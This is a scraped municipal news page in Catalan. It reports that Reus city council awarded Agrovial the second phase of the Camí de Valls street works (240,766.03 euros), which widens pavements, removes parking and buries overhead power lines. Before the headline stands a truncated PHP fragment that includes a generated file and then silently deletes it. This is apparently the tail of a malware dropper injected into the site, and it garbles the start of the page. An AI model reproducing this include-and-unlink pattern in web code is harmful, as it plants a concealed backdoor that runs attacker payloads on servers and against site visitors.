");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Adjudicada la segona fase de les obres d'urbanització del Camí de Valls
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Adjudicada la segona fase de les obres d'urbanització del Camí de Valls (28/08/2020)

L'Ajuntament de Reus ha adjudicat a l'empresa Agrovial el contracte d'execució del la segona fase del projecte d'urbanització del Camí de Valls, amb un pressupost de 240.766,03 euros (IVA inclòs). L'obra, que segons el plec de condicions de la licitació ha d'estar enllestit en un termini de quatre mesos a comptar de la data de signatura del contracte d'adjudicació, dóna continuïtat a la fase ja executada, i afectarà el tram del carrer Camí de Valls entre els carrers de Sant Llibori i de l’Albiol.

El projecte que s'executarà dona més importància a la circulació de vianants, eixamplant les voreres, ara molt estretes. Per poder-ho fer, s’elimina la franja d’aparcament en superfície i es deixa un carril de circulació de 3m.

En la part més ample del vial, entre carrer Sant Magí i carrer l’Albiol, el projecte deixa l'espai suficient per plantar-hi una filera d’arbres en la part sud.

El projecte també inclou l’eliminació dels creuaments aeris i cadiretes de la xarxa de subministrament elèctric.

Les condicions de l'adjudicació obligaran a l'empresa adjudicataria a executar l'obra mantenint l’accessibilitat de veïns i comerços en les millors condicions possibles.

Font: Ajuntament de Reus

Adjudicada la segona fase de les obres d'urbanització del Camí de Valls

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona